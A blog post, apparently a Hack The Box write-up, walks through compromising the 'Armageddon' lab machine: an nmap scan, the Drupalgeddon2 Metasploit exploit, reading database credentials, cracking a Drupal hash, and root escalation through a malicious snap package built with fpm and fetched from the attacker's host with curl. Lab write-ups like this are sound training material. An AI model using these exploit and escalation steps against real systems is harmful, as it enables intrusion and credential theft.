Open in app

Sign in

Write

Sign in

HTB: Armageddon

Praddyum Verma
5 min readJul 25, 2021
HTB badge

Machine IP: 10.10.10.233
System IP: 10.10.16.12

Network Mapper

nmap -T4 -p- -A -v -oN ./Nmap.txt 10.10.10.233

which output the following

Nmap scan report for 10.10.10.233
Host is up (0.17s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp    open     http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon
16971/tcp filtered unknown
21142/tcp filtered unknown
58039/tcp filtered unknown

On visiting http://10.10.10.233/ we are greeted with a login page

Armageddon home page

but before trying bruteforcing lets look for any low hanging vulnerabilities so lets look for http://10.10.10.233/robots.txt and in `Disallow:` we see `/CHANGELOG.txt` and it shows that the system is using `Drupal 7.56` which is also quite old.

Sensitive data exposure

On finding for the exploits I landed on rapid7 link. So on setting the options

msfconsole
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 10.10.10.233
set LHOST 10.10.14.175
exploit

And we are inside the system but we are a very low level privileged user `apache` also we can’t list the user directory inside /home/

Listing of /

Our present working directory is `/var/www/html` with following stuffs

-rw-r--r--.  1 apache apache     317 Jun 21  2017 .editorconfig
-rw-r--r--.  1 apache apache     174 Jun 21  2017 .gitignore
-rw-r--r--.  1 apache apache    6112 Jun 21  2017 .htaccess
-rw-r--r--.  1 apache apache  111613 Jun 21  2017 CHANGELOG.txt
-rw-r--r--.  1 apache apache    1481 Jun 21  2017 COPYRIGHT.txt
-rw-r--r--.  1 apache apache    1717 Jun 21  2017 INSTALL.mysql.txt
-rw-r--r--.  1 apache apache    1874 Jun 21  2017 INSTALL.pgsql.txt
-rw-r--r--.  1 apache apache    1298 Jun 21  2017 INSTALL.sqlite.txt
-rw-r--r--.  1 apache apache   17995 Jun 21  2017 INSTALL.txt
-rw-r--r--.  1 apache apache   18092 Nov 16  2016 LICENSE.txt
-rw-r--r--.  1 apache apache    8710 Jun 21  2017 MAINTAINERS.txt
-rw-r--r--.  1 apache apache    5382 Jun 21  2017 README.txt
-rw-r--r--.  1 apache apache   10123 Jun 21  2017 UPGRADE.txt
-rw-r--r--.  1 apache apache    6604 Jun 21  2017 authorize.php
-rw-r--r--.  1 apache apache    5492 Jun  5 16:42 backdoor.php
-rw-r--r--.  1 apache apache     720 Jun 21  2017 cron.php
drwxr-xr-x.  4 apache apache    4096 Jun 21  2017 includes
-rw-r--r--.  1 apache apache     529 Jun 21  2017 index.php
-rw-r--r--.  1 apache apache     703 Jun 21  2017 install.php
drwxr-xr-x.  4 apache apache    4096 Dec  4  2020 misc
drwxr-xr-x. 42 apache apache    4096 Jun 21  2017 modules
drwxr-xr-x.  5 apache apache      70 Jun 21  2017 profiles
-rw-r--r--.  1 apache apache    2189 Jun 21  2017 robots.txt
drwxr-xr-x.  2 apache apache     261 Jun 21  2017 scripts
-rw-r--r--.  1 apache apache      75 Jun  5 19:08 shell.php
drwxr-xr-x.  4 apache apache      75 Jun 21  2017 sites
-rw-r--r--.  1 apache apache 1717749 Jun  5 18:33 sql.dump
-rw-r--r--.  1 apache apache      41 Jun  5 18:55 test.sh
drwxr-xr-x.  7 apache apache      94 Jun 21  2017 themes
-rw-r--r--.  1 apache apache   19986 Jun 21  2017 update.php
-rw-r--r--.  1 apache apache    2200 Jun 21  2017 web.config
-rw-r--r--.  1 apache apache     417 Jun 21  2017 xmlrpc.php
-rw-r--r--.  1 apache apache      41 Jun  5 18:32 z41d.sh

After some enumeration we find some mysql creds in `/var/www/html/sites/default`

Inside default mysql creds

So let’s login in to mysql

mysql -u <username> -p

now lets observe the databases

show databases;
use drupal;
select * from users;

The connection may return values after some delay but it will surely return.

uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone  language        picture init    data
0                                               NULL    0       0       0       0       NULL            0        NULL
1       br************n       $S$DgL2gxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7.oOsUf1xAhaadURt admin@armageddon.eu      filtered_html    1606998756      1607077194      1607076276      1       Europe/London           0       admin@armageddon.eu       a:1:{s:7:"overlay";i:1;}

So we received creds

br************n : $S$DgL2gxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7.oOsUf1xAhaadURt

With some googling I landed on Stackoverflow page and it states that Drupal 7 uses SHA512 with salt.

Lets crack it is using john the ripper and rockyou.txt

And we cracked the password

lets ssh

ssh br************n@10.10.10.233

and we can read the user.txt

with sudo -l we see

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

On searching GTFOBins and we are all set to go.

So what’s happening is that with sudo NOPASS on snap binary we can make a package using fpm and run it as root. Now this allows us to make a custom package which allows us to interact with file system too :).

So if you follow the GTFOBins page you’ll get the output as

- Run install hook of "xxxx" snap if present (run hook "install": uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0)

So it is basicall executing the id command and as we can see that it’s giving output as root user so lets cutomize the package to create something which we want

Note: Make sure FPM is installed on your device.

COMMAND='cat root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

As we just needed the root flag so we output that only `COMMAND=’cat root/root.txt’` or if we wanted shell as user then we could have added our user to root grp or whecould have added 777 permission to sudoers and many more ways.

And transfer the file xxx_1.0_all.snap to our target machine using

python3 -m http.server 8080

and on target terminal

curl http://10.10.14.214:8080/xxxx_1.0_all.snap --output xxxx_1.0_all.snap

and we run it

sudo snap install xxxx_1.0_all.snap --dangerous --devmode
We got the root flag

And done, We’ll meet soon with another awesome writeup till then stay tuned and keep hacking.

Htb Writeup
Armageddon
Hackthebox Writeup
Hacking
Cybersecurity

--

--

Praddyum Verma

Written by Praddyum Verma

39 Followers

A very enthusiastic and learning behavior with a mentality of over-promising and over-delivering having experience working as freelance.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams